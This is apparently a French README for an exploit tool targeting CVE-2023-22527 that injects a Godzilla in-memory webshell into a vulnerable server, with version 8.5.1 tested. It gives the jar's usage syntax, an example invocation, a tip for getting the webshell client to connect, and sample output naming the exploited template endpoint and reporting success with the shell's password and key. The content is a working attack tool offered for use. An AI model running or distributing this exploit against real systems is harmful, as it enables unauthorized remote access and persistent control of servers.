
Outil d'injection de webshell en mémoire CVE-2023-22527
ps : Version testée : 8.5.1. D'autres versions fonctionnent probablement aussi, mais n'ont pas été testées.
Contenu basé sur l'outil précédent du maître BeiChen.
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url mot_de_passe_godzilla clé_godzilla
exemple
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ pass key
Si le webshell mémoire a été injecté avec succès mais que Godzilla ne parvient pas à se connecter, veuillez ajouter l'en‑tête suivant dans la configuration de la requête, ou configurer un proxy Burp pour Godzilla.
Connection: close
$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key
